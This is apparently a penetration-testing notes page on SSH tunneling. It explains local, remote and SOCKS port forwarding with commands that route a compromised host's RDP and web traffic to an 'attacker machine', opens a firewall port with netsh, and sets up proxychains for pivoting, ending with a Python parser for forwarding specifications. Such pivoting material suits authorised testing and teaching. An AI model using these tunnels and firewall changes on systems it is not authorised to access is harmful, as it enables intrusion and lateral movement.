Tunneling

SSH tunneling is a technique used to encapsulate traffic from other protocols within an SSH connection. It is commonly used for secure communication between machines, accessing restricted services, or exposing services securely. There are two main types of SSH tunneling: Local Port Forwarding and Remote Port Forwarding.

Use Cases

Accessing Hidden Services

Gain access to a machine with an SSH client (e.g., PC-1).

Use SSH tunneling to connect to restricted services on another machine (SERVER) that are inaccessible directly from the attacker machine.

Exposing Services Securely

Gain access to a machine with an SSH server.

Use SSH tunneling to forward or expose services from the attacking machine to the SSH server.

Preparation

Create an SSH user on the attacker machine. To enable tunneling, add a dedicated SSH user on the attacker machine (the /bin/true login shell prevents interactive logins but still allows port forwarding with -N):

useradd tunneluser -m -d /home/tunneluser -s /bin/true

passwd tunneluser

Local Port Forwarding

Purpose: Forward a local port on the SSH client to a service reachable from the SSH server (in this scenario, a service on the attacker machine), allowing external users to reach that service via the SSH client.

Example Scenario:

  • PC-1 establishes a local port forwarding tunnel to expose a web service hosted on the attacker's machine to SERVER.

  • Steps:

    • From PC-1, run:

      ssh tunneluser@1.1.1.1 -L *:80:127.0.0.1:80 -N

    • Add a firewall rule on PC-1 to allow traffic on port 80:

      netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80

    • Once the tunnel is set up, anyone browsing to PC-1 at http://2.2.2.2:80 will see the website hosted on the attacker machine.


Remote Port Forwarding

Purpose: Forward a port on the SSH server to a service on another machine, allowing the attacker to access the service via the SSH server.

Example Scenario:

  • Expose PC-1's Remote Desktop (RDP) service to the attacker machine securely.

  • Steps:

    • From PC-1, run:

      ssh tunneluser@1.1.1.1 -R 3389:3.3.3.3:3389 -N

    • From the attacker machine, connect to the forwarded port via RDP:

      xfreerdp /v:127.0.0.1 /u:MyUser /p:MyPassword


Using Private Keys

When using private keys for authentication (more common in the second use case), the following command can be used for local port forwarding:

ssh -i <PRIVATE_KEY> <user>@<ip> -L <NEW_PORT>:127.0.0.1:<HIDDEN_SERVICE_PORT>


Summary

  • Local Port Forwarding
      Command: ssh tunneluser@1.1.1.1 -L *:80:127.0.0.1:80 -N
      Purpose: Forward a local port to a service on the target machine.

  • Remote Port Forwarding
      Command: ssh tunneluser@1.1.1.1 -R 3389:3.3.3.3:3389 -N
      Purpose: Forward a remote port on the SSH server to a service on another machine (e.g., RDP access).

  • Private Key Use
      Command: ssh -i <PRIVATE_KEY> <user>@<ip> -L <NEW_PORT>:127.0.0.1:<HIDDEN_SERVICE_PORT>
      Purpose: Use private keys for authentication when setting up local port forwarding.

Dynamic Port Forwarding with SOCKS

  • Purpose: Access multiple ports or hosts via a pivot machine using a SOCKS proxy.

  • Set Up Tunnel:

      ssh tunneluser@1.1.1.1 -D 9050 -N

  • Configure ProxyChains: Add to /etc/proxychains.conf:

      [ProxyList]
      socks4 127.0.0.1 9050

  • Use ProxyChains: Route traffic through the proxy:

      proxychains curl http://target-service.com

  • Note: Some tools (e.g., nmap) may not work well with SOCKS, because a SOCKS proxy only relays TCP connections; raw-socket scans and ICMP probes bypass it entirely.
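The three forwarding modes above are easy to confuse because the same [bind_address:]port:host:hostport syntax means different things for -L and -R. As an added example that is not part of the original page, the following Python helper parses the -L, -R and -D arguments used on this page and states which side opens the listening socket, which side makes the outbound connection, and when the bind address depends on the sshd GatewayPorts setting; the three commands from this page are embedded as constructed sample input.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class Forward:
    kind: str                 # "local", "remote" or "dynamic"
    listen_side: str          # machine that opens the listening socket
    bind_addr: str            # address the listener binds to
    bind_port: int
    dest_host: Optional[str]  # None for -D: the SOCKS client picks the target
    dest_port: Optional[int]
    note: str = ""

def _bind(addr: Optional[str]) -> str:
    # OpenSSH semantics: omitted -> loopback only; "" or "*" -> all interfaces
    return "127.0.0.1" if addr is None else ("0.0.0.0" if addr in ("", "*") else addr)

def parse_forward(flag: str, spec: str) -> Forward:
    """Parse an OpenSSH -L/-R/-D argument: [bind_address:]port[:host:hostport].
    IPv6 bracket syntax is not handled (simplification in this example)."""
    parts = spec.split(":")
    if flag == "-D":
        if len(parts) not in (1, 2):
            raise ValueError(f"bad -D spec: {spec}")
        addr = parts[0] if len(parts) == 2 else None
        return Forward("dynamic", "ssh client", _bind(addr), int(parts[-1]), None, None,
                       "SOCKS listener; each proxied connection leaves from the ssh server")
    if flag not in ("-L", "-R") or len(parts) not in (3, 4):
        raise ValueError(f"bad {flag} spec: {spec}")
    addr = parts[0] if len(parts) == 4 else None
    port, host, hostport = int(parts[-3]), parts[-2], int(parts[-1])
    if flag == "-L":
        return Forward("local", "ssh client", _bind(addr), port, host, hostport,
                       f"{host}:{hostport} is resolved and connected to from the ssh server")
    note = f"{host}:{hostport} is resolved and connected to from the ssh client"
    if _bind(addr) != "127.0.0.1":
        note += "; binding beyond loopback needs sshd GatewayPorts yes/clientspecified"
    return Forward("remote", "ssh server", _bind(addr), port, host, hostport, note)

def explain(flag: str, spec: str) -> str:
    f = parse_forward(flag, spec)
    target = "target chosen per SOCKS request" if f.dest_host is None else f"{f.dest_host}:{f.dest_port}"
    return f"{f.kind}: {f.listen_side} listens on {f.bind_addr}:{f.bind_port} -> {target} ({f.note})"

# Constructed sample input: the three tunnel commands used on this page
PAGE_COMMANDS = [("-L", "*:80:127.0.0.1:80"), ("-R", "3389:3.3.3.3:3389"), ("-D", "9050")]

def explain_page_commands() -> list:
    return [explain(flag, spec) for flag, spec in PAGE_COMMANDS]
```

Running explain_page_commands() shows why the RDP example connects to 127.0.0.1 on the attacker machine: without a bind address, -R listens on the server's loopback only.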